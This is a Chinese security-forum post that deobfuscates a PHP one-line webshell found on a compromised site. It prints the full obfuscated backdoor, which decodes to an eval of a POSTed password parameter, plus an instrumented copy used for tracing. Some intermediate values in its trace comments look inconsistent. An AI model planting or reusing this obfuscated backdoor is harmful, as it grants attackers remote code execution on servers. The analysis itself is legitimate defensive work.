用户
搜索
  • TA的每日心情
    无聊
    2017-5-25 10:08
  • 签到天数: 7 天

    连续签到: 2 天

    [LV.3]偶尔看看II

    i春秋签约作家

    Rank: 7Rank: 7Rank: 7

    30

    主题

    59

    帖子

    312

    魔法币
    收听
    0
    粉丝
    7
    注册时间
    2015-11-20

    签约作者

    发表于 2017-5-26 11:15:01 23762
    对某加密一句话shell的解密
    antian365.comsimeon
       由于攻防技术对抗的发展,硬件防火墙+软件Waf+杀毒软件的防护已经使得普通webshell在渗透过程中生存周期越来越短;在实际项目渗透测试过程中,可能会遇到前人渗透过留下的webshell,这些webshell大多数是进行过加密处理的,这个时候就需要对webshell进行分析,获取以下一些信息:
    1)文件md5校验,收集webshellmd5值。一般来讲webshell加密完成后一般不会对其内容进行更改,因此其文件内容md5值相对固定。
    2)对源代码进行解密,获取其加密密码,加密密码如果不是普通的密码,可以用来分析密码习惯,利用社工库来追踪黑客轨迹。
    3)源代码关键字收集,在webshell源代码中有可能会留下QQ独特信息。
       本文对收集到的一款webshell(一句话后门)进行代码解密及分析,学习它人加密思路和长处,在后续过程可以复用,同时本文还对一些常见的加密变换函数进行了分析和介绍。
    1.1源代码
    在网站目录下获取的一句话后门文件,通过查看其源代码,发现其中基本是一堆乱码,根据经验判断应该是一句话后面经过变异以后的代码,其完整源代码如下:
    <?php
    $xN =$xN.substr("iyb42str_relgP804",5,6);
    $lvcg =str_split("muk9aw28wltcq",6);
    $xN =$xN.substr("l9cdplacepArBE9dk",4,5);
    $jl =stripos("epxwkl7f66tfkt","jl");
    $t = $t.substr("tQGV2YWwJcVu4",1,6);
    $eia7 =trim("j8l2wml46reen");
    $b =$b.substr("kbase64kBDt9L6nm",1,6);
    $ig =trim("b39w0gnuli");
    $y =$y.$xN("rY","","crYrerYa");
    $yu1 =str_split("bi1b87m8a0o6x",2);
    $t =$t.$xN("xA6x","","wxA6xoJF9");
    $nd =stripos("n65t88rxn02edj3f0","nd");
    $b =$b.$xN("wI39","","_wI39dwI39ec");
    $h8ps =str_split("kn9j9h4mhwgf3fjip",3);
    $y =$y.substr("hyte_funwViSVE4J",2,6);
    $yf7 =strlen("uehu49g6tg5ko");
    $t =$t.$xN("fp","","QfpTfp1Nfp");
    $m9 =strlen("eul604cobk");
    $b = $b.substr("l0W1odelA1eSnEJ",4,3);
    $h0bw =trim("n3e5h0cqtokvgob8tx");
    $y =$y.$xN("yb","","cybtio");
    $s7a =rtrim("auebyc9g4t5d8k");
    $t =$t.substr("bMs0nBh83UWyd",9,4);
    $d59q =stripos("cjvuckoy5wf3otea","d59q");
    $y =$y.substr("nD9HxQSL8ngR",9,1);
    $l1 = str_split("agqq09gbqn1",4);
    $t =$t.$xN("w6o4","","wcDw6o4Yw6o40");
    $py =stripos("lgy8htrrv1tc3","py");
    $t =$t.$xN("eP32","","bXFeP32h");
    $xp3d =stripos("ukl0nbnx9gt3","xp3d");
    $t =$t.substr("ikJ00HJMngxc",7,5);
    $dt2b =strlen("e4a5abuajw3vlcira");
    $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4);
    $ubj =strlen("wghjnft2op5kx1c086t");
    $t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6);
    $qx =strlen("rlqfkkftro8gfko7ya");
    $t =$t.substr("r7y",1,1);
    $mu =rtrim("ngdxwux5vqe1");
    $j =$y("", $b($t));
    $bnlp =strlen("vufy0ak1fyav");
    $sdh =str_split("wmnjvg3c7p0m",4);
    $mb =ltrim("n52p1pgaepeokf");
    $e0pw =rtrim("uu4mhgp5c9pna4egq");
    $ugh =trim("rcpd3o9w99tio9");
    $grck =strlen("x5rix5bp1xky7");
    $eo6t =strlen("ddi1h14ecuyuc7d");$j();
    $dvnq = str_split("prm6giha1vro3604au",8);
    $ug8 =rtrim("ec8w52supb4vu8eo");
    $rct =stripos("hxe6wo7ewd8me7dt","rct");
    $ekqf =str_split("prf5y08e8flffw025j8",8);
    $vyr =str_split("umpjcsrfg6h5nd6o45",9);
    $wrf =rtrim("fyx99o7938h7ugqh");
    $q14 =strlen("tc46osxl1st1ic2");
    functiono( ){   };
    $usf =strlen("fltcpxb7tfbjsmt");
    ?>
    1.2源代码中用到的函数
       对代码中的函数进行统计和去重,主要使用函数有:
      1substr函数:substr(string,start,length),返回字符串的一部分,参数信息如下:
    string 必需,规定要返回其中一部分的字符串。
    start          必需,规定在字符串的何处开始;正数值则在字符串的指定位置开始,负数则从字符串结尾开始的指定位置开始;0值则在字符串中的第一个字符处开始。
    length可选,规定被返回字符串的长度,默认是直到字符串的结尾。正数值是从 start 参数所在的位置返回的长度,负数值从字符串末端返回的长度。使用一段代码来解释其具体应用,效果如图1所示。
    <?php
    echosubstr("Hello world",6);
    echo'<br>';
    echo  substr("iyb42str_relgP804",5,6);
    ?>
    stringHello worldstart值为6length没有设置,为缺省值表示直到字符串的结尾;从第6位开始取值,到字符串末尾,因此值为“world
    substr("iyb42str_relgP804",5,6)表示从iyb42str_relgP804字符串第5位后取值,取6位字符串值为“str_re”。
    1.JPG
    1代码运行效果
    2str_split(string,length)str_split() 函数把字符串分割到数组中,其参数:
    string        必需,规定要分割的字符串。
    length       可选,规定每个数组元素的长度,默认是 1
    $lvcg =str_split("muk9aw28wltcq",6);
    上面的意思是使用6位来分割字符串,也即每六位字符串放入数组中,使用print_r函数来打印数组,print_r(str_split("muk9aw28wltcq",6));其运行结果如图2所示。
    str_reArray ( [0] => muk9aw [1] =>28wltc [2] => q )
    2.JPG
    2 str_split分割字符串函数
    3stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)。
    4trim() 函数移除字符串两侧的空白字符或其他预定义字符。在本次代码中仅仅使用了trim()函数主要用来去除字符串前后的空格。rtrim()ltrim()去除右边或者左边空格字符串或者指定字符串。
    5strlen() 函数返回字符串的长度
    6str_replace(find,replace,string,count)str_replace()函数以其他字符替换字符串中的一些字符(区分大小写),其参数值:
    find  必需,规定要查找的值。
    replace     必需,规定替换 find 中的值的值。
    string        必需,规定被搜索的字符串。
    count        可选,对替换数进行计数的变量。
    str_replace(find,replace,string,count)换一句话来解释就是,从string中去查找(find),然后使用replace进行替换,count是替换的次数。
    7function(),调用函数。
    1.3获取shell密码
    通过利用上面的函数对加密源代码进行解读:
    其核心代码为
    $j =$y("", $b($t)); base64_dec(QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53NjgnXSk7)
    QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53NjgnXSk7dbase64加密,解密后即可得到一句话加密的代码:
    @eval($_POST['pp64mqa2x1rnw68']);
    运行结果逐条分析
    <?php
    $xN =$xN.substr("iyb42str_relgP804",5,6);//获取 str_re
    $lvcg =str_split("muk9aw28wltcq",6); //获取str_reArray ( [0]=> muk9aw [1] => 28wltc [2] => q )
    $xN =$xN.substr("l9cdplacepArBE9dk",4,5); //获取$xN 值为str_replace
    $jl =stripos("epxwkl7f66tfkt","jl"); //值为0无意义
    $t =$t.substr("tQGV2YWwJcVu4",1,6); //$t 值为QGV2YW
    $eia7 =trim("j8l2wml46reen");//值无意义
    $b =$b.substr("kbase64kBDt9L6nm",1,6); //$b 值为base64
    $ig =trim("b39w0gnuli");//值无意义
    $y =$y.$xN("rY","","crYrerYa"); $y =$y.str_replace("rY","","crea"); //$y值为crea
    $yu1 =str_split("bi1b87m8a0o6x",2); Array ( [0] => bi [1] => 1b [2]=> 87 [3] => m8 [4] => a0 [5] => o6 [6] => x ) //值无意义
    $t =$t.$xN("xA6x","","wxA6xoJF9"); //$t 值为woJF9QGV2YWwoJF9
    $nd =stripos("n65t88rxn02edj3f0","nd"); //值无意义0
    $b =$b.$xN("wI39","","_wI39dwI39ec");  //$b 值为base64_dec
    $h8ps =str_split("kn9j9h4mhwgf3fjip",3); //值无意义
    $y =$y.substr("hyte_funwViSVE4J",2,6); create_fun
    $yf7 =strlen("uehu49g6tg5ko"); //值无意义uehu49g6tg5ko
    $t =$t.$xN("fp","","QfpTfp1Nfp"); //$tQT1N累加为 QGV2YWwoJF9QT1N
    $m9 =strlen("eul604cobk"); //值无意义eul604cobk
    $b = $b.substr("l0W1odelA1eSnEJ",4,3);base64_decode
    $h0bw =trim("n3e5h0cqtokvgob8tx"); //值无意义n3e5h0cqtokvgob8tx
    $y =$y.$xN("yb","","cybtio");  //$y值为create_functio
    $s7a =rtrim("auebyc9g4t5d8k"); //值无意义auebyc9g4t5d8k
    $t =$t.substr("bMs0nBh83UWyd",9,4); //$tUWyd累加为QGV2YWwoJF9QT1NUWyd
    $d59q =stripos("cjvuckoy5wf3otea","d59q"); //值无意义0
    $y =$y.substr("nD9HxQSL8ngR",9,1); //$y值为create_function
    $l1 =str_split("agqq09gbqn1",4); //值无意义09gbqn1
    $t =$t.$xN("w6o4","","wcDw6o4Yw6o40"); //$t值为wcDY0QGV2YWwoJF9QT1NUWydwcDY0
    $py =stripos("lgy8htrrv1tc3","py");//值无意义0
    $t =$t.$xN("eP32","","bXFeP32h"); //$t值为bXFhQGV2YWwoJF9QT1NUWydwcDY0bXFh
    $xp3d =stripos("ukl0nbnx9gt3","xp3d"); //值无意义0
    $t =$t.substr("ikJ00HJMngxc",7,5); //$t值为QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMn
    $dt2b =strlen("e4a5abuajw3vlcira"); //值无意义e4a5abuajw3vlcira
    $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4); //$t值为QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53N
    $ubj =strlen("wghjnft2op5kx1c086t"); //值无意义wghjnft2op5kx1c086t
    $t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6); //$t值为QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53NjgnXSk
    $qx =strlen("rlqfkkftro8gfko7ya");//值无意义rlqfkkftro8gfko7ya
    $t =$t.substr("r7y",1,1); //$t值为QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53NjgnXSk7
    $mu =rtrim("ngdxwux5vqe1"); //值无意义ngdxwux5vqe1
    $j =$y("", $b($t)); //关键值代码:base64_dec(QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53NjgnXSk7)
    $bnlp =strlen("vufy0ak1fyav");  //值无意义12
    $sdh =str_split("wmnjvg3c7p0m",4); //值无意义vg3c7p0m
    $mb =ltrim("n52p1pgaepeokf"); //值无意义n52p1pgaepeokf
    $e0pw =rtrim("uu4mhgp5c9pna4egq");  //值无意义uu4mhgp5c9pna4egq
    $ugh =trim("rcpd3o9w99tio9");  //值无意义rcpd3o9w99tio9
    $grck =strlen("x5rix5bp1xky7"); //值无意义13
    $eo6t =strlen("ddi1h14ecuyuc7d"); //值无意义15
    $j();//base64_dec(QGV2YWwoJF9QT1NUWydwcDY0bXFh0HJMnm53NjgnXSk7)(),调用函数
    $dvnq =str_split("prm6giha1vro3604au",8); //值无意义1vro3604au
    $ug8 =rtrim("ec8w52supb4vu8eo"); //值无意义ec8w52supb4vu8eo
    $rct =stripos("hxe6wo7ewd8me7dt","rct");//值无意义0
    $ekqf =str_split("prf5y08e8flffw025j8",8); //值无意义
    $vyr =str_split("umpjcsrfg6h5nd6o45",9); //值无意义
    $wrf = rtrim("fyx99o7938h7ugqh");//值无意义
    $q14 =strlen("tc46osxl1st1ic2");//值无意义
    functiono( ){   };
    $usf =strlen("fltcpxb7tfbjsmt");//值无意义
    ?>
    1.4解密的另外一个思路
        就是通过打印函数执行的结果来进行判断,可以做如下一些代码修改:
    <?php
    $xN =$xN.substr("iyb42str_relgP804",5,6);
    print"xN is $xN  ";
    echo"<br>";
    $lvcg =str_split("muk9aw28wltcq",6);
    print"lvcg is $lvcg";
    echo"<br>";
    $xN =$xN.substr("l9cdplacepArBE9dk",4,5);
    print"xN is $xN";
    echo"<br>";
    $jl =stripos("epxwkl7f66tfkt","jl");
    print"jl is $jl";
    echo"<br>";
    $t =$t.substr("tQGV2YWwJcVu4",1,6);
    print"t is $t";
    echo"<br>";
    $eia7 =trim("j8l2wml46reen");
    print"eia7 is $eia7";
    echo"<br>";
    $b =$b.substr("kbase64kBDt9L6nm",1,6);
    print"b is $b";
    echo"<br>";
    $ig =trim("b39w0gnuli");
    print"ig is $ig";
    echo"<br>";
    $y = $y.$xN("rY","","crYrerYa");
    print"y is $y";
    echo"<br>";
    $yu1 =str_split("bi1b87m8a0o6x",2);
    print"yu1 is $yu1";
    echo"<br>";
    $t =$t.$xN("xA6x","","wxA6xoJF9");
    print"t is $t";
    echo"<br>";
    $nd =stripos("n65t88rxn02edj3f0","nd");
    print"nd is $nd";
    echo"<br>";
    $b =$b.$xN("wI39","","_wI39dwI39ec");
    print"b is $b";
    echo"<br>";
    $h8ps =str_split("kn9j9h4mhwgf3fjip",3);
    print"h8ps is $h8ps";
    echo"<br>";
    $y =$y.substr("hyte_funwViSVE4J",2,6);
    print"y is $y";
    echo"<br>";
    $yf7 = strlen("uehu49g6tg5ko");
    print"yf7 is $yf7";
    echo"<br>";
    $t =$t.$xN("fp","","QfpTfp1Nfp");
    print"t is $t";
    echo"<br>";
    $m9 =strlen("eul604cobk");
    print"m9 is $m9";
    echo"<br>";
    $b =$b.substr("l0W1odelA1eSnEJ",4,3);
    print"b is $b";
    echo"<br>";
    $h0bw =trim("n3e5h0cqtokvgob8tx");
    print"h0bw is $h0bw";
    echo"<br>";
    $y =$y.$xN("yb","","cybtio");
    print"y is $y";
    echo"<br>";
    $s7a =rtrim("auebyc9g4t5d8k");
    print"s7a  is $s7a ";
    echo"<br>";
    $t =$t.substr("bMs0nBh83UWyd",9,4);
    print"t is $t";
    echo"<br>";
    $d59q =stripos("cjvuckoy5wf3otea","d59q");
    print"d59q is $d59q";
    echo"<br>";
    $y =$y.substr("nD9HxQSL8ngR",9,1);
    print"y is $y";
    echo"<br>";
    $l1 =str_split("agqq09gbqn1",4);
    print"l1 is $l1";
    echo"<br>";
    $t = $t.$xN("w6o4","","wcDw6o4Yw6o40");
    print"t is $t";
    echo"<br>";
    $py =stripos("lgy8htrrv1tc3","py");
    print"py is $py";
    echo"<br>";
    $t =$t.$xN("eP32","","bXFeP32h");
    print"t is $t";
    echo"<br>";
    $xp3d =stripos("ukl0nbnx9gt3","xp3d");
    print"xp3d is $xp3d";
    echo"<br>";
    $t =$t.substr("ikJ00HJMngxc",7,5);
    print"t is $t";
    echo"<br>";
    $dt2b =strlen("e4a5abuajw3vlcira");
    print"dt2b is $dt2b";
    echo"<br>";
    $t =$t.substr("cdN1Kxem53NwmEh86BS",7,4);
    print"t is $t";
    echo"<br>";
    $ubj = strlen("wghjnft2op5kx1c086t");
    print"ubj is $ubj";
    echo"<br>";
    $t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6);
    print"t is $t";
    echo"<br>";
    $qx =strlen("rlqfkkftro8gfko7ya");
    print"qx  is $qx ";
    echo"<br>";
    $t =$t.substr("r7y",1,1);
    print"t is $t";
    echo"<br>";
    $mu =rtrim("ngdxwux5vqe1");
    print"mu  is $mu ";
    echo"<br>";
    $j =$y("", $b($t));
    print"j is $j";
    echo"<br>";
    $bnlp =strlen("vufy0ak1fyav");
    print"bnlp is $bnlp";
    echo"<br>";
    $sdh =str_split("wmnjvg3c7p0m",4);
    print"sdh is $sdh";
    echo "<br>";
    $mb =ltrim("n52p1pgaepeokf");
    print"mb is $mb";
    echo"<br>";
    $e0pw =rtrim("uu4mhgp5c9pna4egq");
    print"e0pw is $e0pw";
    echo"<br>";
    $ugh =trim("rcpd3o9w99tio9");
    print"ugh is $ugh";
    echo"<br>";
    $grck =strlen("x5rix5bp1xky7");
    print"grck is $grck";
    echo"<br>";
    $eo6t =strlen("ddi1h14ecuyuc7d");$j();
    print"eo6t is $eo6t";
    echo"<br>";
    $dvnq =str_split("prm6giha1vro3604au",8);
    print"dvnq is $dvnq";
    echo"<br>";
    $ug8 =rtrim("ec8w52supb4vu8eo");
    print"ug8 is $ug8";
    echo"<br>";
    $rct =stripos("hxe6wo7ewd8me7dt","rct");
    print"rct is $rct";
    echo"<br>";
    $ekqf =str_split("prf5y08e8flffw025j8",8);
    print"ekqf  is $ekqf ";
    echo"<br>";
    $vyr =str_split("umpjcsrfg6h5nd6o45",9);
    print"vyr is $vyr";
    echo"<br>";
    $wrf =rtrim("fyx99o7938h7ugqh");
    print"wrf is $wrf";
    echo"<br>";
    $q14 =strlen("tc46osxl1st1ic2");
    print"14 is $14";
    functiono( ){   };
    $usf =strlen("fltcpxb7tfbjsmt");
    echo"<br>";
    print$usf;
    ?>
    1.5.参考资料
    http://www.w3school.com.cn/php/func_string_str_replace.asp
    http://www.w3school.com.cn/php/func_string_substr.asp

    3.JPG

    本帖被以下淘专辑推荐:

    yyyxy 管理员 六国战旗移动展示平台! 秦 楚 燕 魏 齐 赵
    来自 2#
    发表于 2017-6-6 11:44:19
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!
    奖金
    点评
    50
    思路不错,还对代码的意义进行了逐行分析,下次加油

    使用道具 举报 回复
    发表于 2017-6-9 17:05:45
    黑阔 密码学来一波
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册